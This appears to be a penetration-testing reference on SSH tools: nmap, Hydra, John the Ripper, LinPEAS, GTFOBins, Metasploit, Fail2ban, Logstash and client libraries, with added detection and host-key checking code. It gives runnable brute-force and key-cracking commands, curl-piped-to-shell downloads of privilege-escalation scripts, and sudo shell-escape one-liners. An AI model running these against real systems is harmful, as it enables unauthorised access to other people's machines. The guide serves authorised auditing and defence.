Comprehensive guide to tools used for SSH reconnaissance, scanning, exploitation, and post-exploitation
Nmap (Network Mapper) is a free and open-source utility for network discovery and security auditing. It's one of the most versatile tools for SSH reconnaissance and scanning.
```bash
# Basic SSH scan
nmap -p 22 192.168.1.0/24
# Service version detection
nmap -sV -p 22 192.168.1.1
# SSH script scanning
nmap --script ssh-auth-methods -p 22 192.168.1.1
# SSH brute force
nmap --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt -p 22 192.168.1.1
# SSH host key checking
nmap --script ssh-hostkey -p 22 192.168.1.1
```

Installation:

```bash
# Debian/Ubuntu
sudo apt-get install nmap
# Red Hat/CentOS
sudo yum install nmap
# macOS
brew install nmap
```
SSH-Audit is a tool for SSH server auditing. It analyzes SSH server configuration and identifies security issues.
```bash
# Basic usage (the pip package installs the command as `ssh-audit`; the
# checkout from source provides `ssh-audit.py`)
ssh-audit.py 192.168.1.1
# Specify port
ssh-audit.py 192.168.1.1:2222
# JSON output
ssh-audit.py --json 192.168.1.1
# Policy-based scanning
ssh-audit.py -P policy.txt 192.168.1.1
# Batch scanning
ssh-audit.py -T targets.txt
```

Installation:

```bash
# Using pip
pip install ssh-audit
# From source
git clone https://github.com/jtesta/ssh-audit.git
cd ssh-audit
./ssh-audit.py
```
Hydra is a parallelized login cracker which supports numerous protocols including SSH. It's one of the most popular tools for SSH password brute forcing.
```bash
# Basic usage
hydra -l username -P wordlist.txt ssh://192.168.1.1
# Multiple usernames
hydra -L usernames.txt -P passwords.txt ssh://192.168.1.1
# Specify port
hydra -l username -P wordlist.txt ssh://192.168.1.1:2222
# Limit parallel tasks
hydra -t 4 -l username -P wordlist.txt ssh://192.168.1.1
# Verbose output
hydra -V -l username -P wordlist.txt ssh://192.168.1.1
```

Installation:

```bash
# Debian/Ubuntu
sudo apt-get install hydra
# Red Hat/CentOS
sudo yum install hydra
# macOS
brew install hydra
```
John the Ripper is a fast password cracker that can be used to crack SSH private key passphrases.
```bash
# Convert SSH private key to John format
ssh2john id_rsa > id_rsa.hash
# Crack the key with John
john --wordlist=wordlist.txt id_rsa.hash
# Show cracked passwords
john --show id_rsa.hash
# Use incremental mode
john --incremental id_rsa.hash
# Use rules
john --wordlist=wordlist.txt --rules id_rsa.hash
```

Installation:

```bash
# Debian/Ubuntu
sudo apt-get install john
# Red Hat/CentOS
sudo yum install john
# macOS
brew install john
```
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix hosts.
```bash
# Download and execute
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Execute from local file
./linpeas.sh
# Execute with more thorough checks
./linpeas.sh -a
```
LinEnum is a simple bash script that performs common commands related to privilege escalation.
```bash
# Download and execute
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
# Execute from local file
./LinEnum.sh
# Execute with thorough checks
./LinEnum.sh -t
```
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
```bash
# Example: Exploiting sudo vim
sudo vim -c ':!/bin/bash'
# Example: Exploiting sudo less (the second line is typed at the less prompt, not in the shell)
sudo less /etc/passwd
!/bin/bash
# Example: Exploiting sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'
```
Logwatch is a customizable log analysis system that can be used to analyze SSH logs.
```bash
# Install Logwatch
apt-get install logwatch
# Run Logwatch for SSH
logwatch --service sshd --range today --detail high
# Generate a report
logwatch --service sshd --range yesterday --detail high --output file --filename /tmp/ssh_report.txt
```
Fail2ban is a tool that scans log files and bans IP addresses that show malicious behavior.
```bash
# Install Fail2ban
apt-get install fail2ban
# Check Fail2ban status
fail2ban-client status sshd
# Check Fail2ban logs
cat /var/log/fail2ban.log
# Unban an IP address
fail2ban-client set sshd unbanip 192.168.1.1
```
The ELK Stack (Elasticsearch, Logstash, Kibana) is a powerful log analysis platform that can be used to analyze SSH logs.
Example Logstash configuration for SSH logs:

```conf
input {
  file {
    path => "/var/log/auth.log"
    type => "syslog"
  }
}

filter {
  if [type] == "syslog" {
    grok {
      match => { "message" => "%{SYSLOGTIMESTAMP:timestamp} %{HOSTNAME:hostname} %{DATA:program}(?:\[%{POSINT:pid}\])?: %{GREEDYDATA:message}" }
      # Without overwrite, grok appends the captured text to the existing "message"
      # field (turning it into an array) instead of replacing it.
      overwrite => [ "message" ]
    }
    if [program] == "sshd" {
      grok {
        # sshd logs unknown accounts as "Failed password for invalid user X ...";
        # the optional group keeps those lines from being dropped as grok failures.
        match => { "message" => "Failed password for (?:invalid user )?%{USERNAME:username} from %{IP:src_ip} port %{NUMBER:src_port} ssh2" }
      }
    }
  }
}

output {
  elasticsearch {
    hosts => ["localhost:9200"]
    index => "ssh-logs-%{+YYYY.MM.dd}"
  }
}
```
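The Logstash pipeline above extracts failed logins and Fail2ban bans a source after repeated failures in a time window. The following added example (not from the original page, Logstash or Fail2ban) parses the same auth.log lines in plain Python and applies a Fail2ban-style threshold; the log lines and the year used for the timestamps are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
# Two-stage match like the grok patterns: syslog envelope, then the sshd message.
# The auth pattern also accepts sshd's "invalid user" form for unknown accounts.
SYSLOG_RE = re.compile(
    r"^(?P<timestamp>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<hostname>\S+) "
    r"(?P<program>[\w./-]+)(?:\[(?P<pid>\d+)\])?: (?P<message>.*)$"
)
SSHD_AUTH_RE = re.compile(
    r"^(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<username>\S+) from (?P<src_ip>[0-9A-Fa-f.:]+) port (?P<src_port>\d+) ssh2"
)

def parse_line(line, year=2024):
    """Fields of an sshd authentication line, or None for any other line."""
    m = SYSLOG_RE.match(line)
    if not m or m.group("program") != "sshd":
        return None
    a = SSHD_AUTH_RE.match(m.group("message"))
    if not a:
        return None
    rec = {**m.groupdict(), **a.groupdict()}
    # syslog timestamps carry no year, so the caller supplies one (assumption)
    rec["time"] = datetime.strptime(f"{year} {rec['timestamp']}", "%Y %b %d %H:%M:%S")
    return rec

def find_bruteforce(lines, maxretry=5, findtime=timedelta(minutes=10)):
    """Fail2ban-style rule: ban a source with maxretry failures inside a sliding findtime window."""
    window, banned = defaultdict(deque), {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["result"] != "Failed" or rec["src_ip"] in banned:
            continue
        q = window[rec["src_ip"]]
        q.append(rec["time"])
        while rec["time"] - q[0] > findtime:  # drop failures older than findtime
            q.popleft()
        if len(q) >= maxretry:
            banned[rec["src_ip"]] = rec["time"]  # {src_ip: time the threshold was crossed}
    return banned

SAMPLE_LOG = [  # constructed sample lines, not from a real host
    "Jan 12 10:15:31 bastion sshd[1234]: Failed password for root from 203.0.113.5 port 51234 ssh2",
    "Jan 12 10:15:33 bastion sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2",
    "Jan 12 10:15:35 bastion sshd[1235]: Failed password for root from 203.0.113.5 port 51238 ssh2",
    "Jan 12 10:15:37 bastion sshd[1236]: Failed password for invalid user test from 203.0.113.5 port 51240 ssh2",
    "Jan 12 10:15:40 bastion sshd[1237]: Failed password for root from 203.0.113.5 port 51242 ssh2",
    "Jan 12 10:16:01 bastion sshd[1240]: Accepted publickey for alice from 198.51.100.7 port 40000 ssh2",
    "Jan 12 10:20:12 bastion sshd[1250]: Failed password for bob from 192.0.2.9 port 52000 ssh2",
]
```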
Paramiko is a Python implementation of the SSHv2 protocol, providing both client and server functionality.
```bash
# Install Paramiko
pip install paramiko
```

```python
# Basic SSH client
import paramiko

ssh = paramiko.SSHClient()
# AutoAddPolicy silently trusts any unknown host key, so an interposed server
# receives the password. Outside a lab, load known_hosts and reject unknown keys:
#   ssh.load_system_host_keys(); ssh.set_missing_host_key_policy(paramiko.RejectPolicy())
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('hostname', username='user', password='password')
stdin, stdout, stderr = ssh.exec_command('ls -l')
print(stdout.read().decode())
ssh.close()
```
libssh is a C library implementing the SSHv2 protocol on both the client and server side.

```c
// Basic SSH client
#include <libssh/libssh.h>
#include <stdio.h>   /* fprintf */
#include <stdlib.h>

int main(void) {
    ssh_session my_ssh_session = ssh_new();
    if (my_ssh_session == NULL) {
        exit(-1);
    }
    ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "hostname");
    ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, "username");

    int rc = ssh_connect(my_ssh_session);
    if (rc != SSH_OK) {
        fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session));
        ssh_free(my_ssh_session);
        exit(-1);
    }

    /* No host key verification is done here; a production client must check the
     * server key (ssh_session_is_known_server()) before sending any credentials. */
    rc = ssh_userauth_password(my_ssh_session, NULL, "password");
    if (rc != SSH_AUTH_SUCCESS) {
        fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session));
        ssh_disconnect(my_ssh_session);
        ssh_free(my_ssh_session);
        exit(-1);
    }

    ssh_disconnect(my_ssh_session);
    ssh_free(my_ssh_session);
    return 0;
}
```
Go SSH is a Go package that implements SSH client and server functionality.
```go
// Basic SSH client
package main

import (
	"fmt"
	"log"

	"golang.org/x/crypto/ssh"
)

func main() {
	// Create SSH client config
	config := &ssh.ClientConfig{
		User: "username",
		Auth: []ssh.AuthMethod{
			ssh.Password("password"),
		},
		// InsecureIgnoreHostKey accepts any server key. Outside a lab use
		// ssh.FixedHostKey or golang.org/x/crypto/ssh/knownhosts instead.
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
	}

	// Connect to SSH server
	client, err := ssh.Dial("tcp", "hostname:22", config)
	if err != nil {
		log.Fatalf("Failed to dial: %s", err)
	}
	defer client.Close()

	// Create a session
	session, err := client.NewSession()
	if err != nil {
		log.Fatalf("Failed to create session: %s", err)
	}
	defer session.Close()

	// Run command
	output, err := session.CombinedOutput("ls -l")
	if err != nil {
		log.Fatalf("Failed to run command: %s", err)
	}
	fmt.Printf("%s\n", output)
}
```
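All three client snippets above (Paramiko with AutoAddPolicy, the libssh client, and Go with InsecureIgnoreHostKey) accept whatever host key the server presents, so the password is handed to anyone who can interpose on the connection. The following added example (written for this page, not code from any of those libraries) shows the check a client should apply instead: compute the SHA256 fingerprint in the form ssh-keygen and nmap's ssh-hostkey script print, and look the key up in known_hosts, including the hashed entries HashKnownHosts produces. The key material, salt and hosts are constructed.

```python
import base64, hashlib, hmac

def fingerprint(key_b64):
    """SHA256 fingerprint as OpenSSH and nmap's ssh-hostkey print it: SHA256:<unpadded base64>."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def hash_host(host, salt):
    """Hashed host field as written by ssh-keygen -H / HashKnownHosts: |1|b64(salt)|b64(HMAC-SHA1(salt, host))."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|" + base64.b64encode(salt).decode() + "|" + base64.b64encode(mac).decode()

def host_matches(entry_host, host):
    """Does a known_hosts host field (plain, comma-separated list, or hashed) name host?
    Non-default ports use OpenSSH's "[host]:port" form on both sides."""
    if entry_host.startswith("|1|"):
        _, _, salt_b64, mac_b64 = entry_host.split("|")
        mac = hmac.new(base64.b64decode(salt_b64), host.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(mac, base64.b64decode(mac_b64))
    return host in entry_host.split(",")

def check_host_key(known_hosts_text, host, key_type, key_b64):
    """'match', 'mismatch' (key changed since it was pinned: treat as a possible
    man-in-the-middle and do not send credentials) or 'unknown' (no entry yet:
    verify the fingerprint out of band, then pin it)."""
    seen = False
    for line in known_hosts_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0].startswith(("#", "@")):  # comments; @cert-authority/@revoked not handled here
            continue
        if not host_matches(parts[0], host) or parts[1] != key_type:
            continue
        seen = True
        if hmac.compare_digest(parts[2], key_b64):
            return "match"
    return "mismatch" if seen else "unknown"

# Constructed sample key and known_hosts file (not a real host). In practice key_b64 is
# the key the server sends at connect time and the pinned copy comes from known_hosts
# or from a fingerprint recorded over a trusted path (ssh-keygen -lf, nmap ssh-hostkey).
SALT = bytes(range(20))
KEY_B64 = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(range(32))).decode()
OTHER_B64 = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(32)).decode()
KNOWN_HOSTS = "\n".join([
    "# constructed sample",
    f"bastion.example,192.0.2.10 ssh-ed25519 {KEY_B64}",
    f"{hash_host('[jump.example]:2222', SALT)} ssh-ed25519 {KEY_B64}",
])
```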
Metasploit Framework provides a platform for developing and executing exploit code against remote target machines.
```ruby
# Basic Metasploit module structure
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp   # supplies connect, sock, disconnect and rport
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'SSH Scanner',
      'Description' => 'This module scans for SSH servers.',
      'Author'      => ['Your Name'],
      'License'     => MSF_LICENSE
    ))
    register_options(
      [
        Opt::RPORT(22)
      ], self.class)
  end

  def run_host(ip)
    begin
      connect
      # The SSH identification string (e.g. "SSH-2.0-OpenSSH_...") is the first line the server sends
      banner = sock.get_once(-1, 5)
      if banner
        banner = banner.strip
        print_good("#{ip}:#{rport} - SSH server banner: #{banner}")
        report_service(
          :host => ip,
          :port => rport,
          :name => "ssh",
          :info => banner
        )
      end
    rescue ::Rex::ConnectionError
      print_error("#{ip}:#{rport} - Connection failed")
    ensure
      disconnect
    end
  end
end
```
Impacket is a collection of Python classes for working with network protocols, including SSH.
Scapy is a powerful Python-based interactive packet manipulation program and library.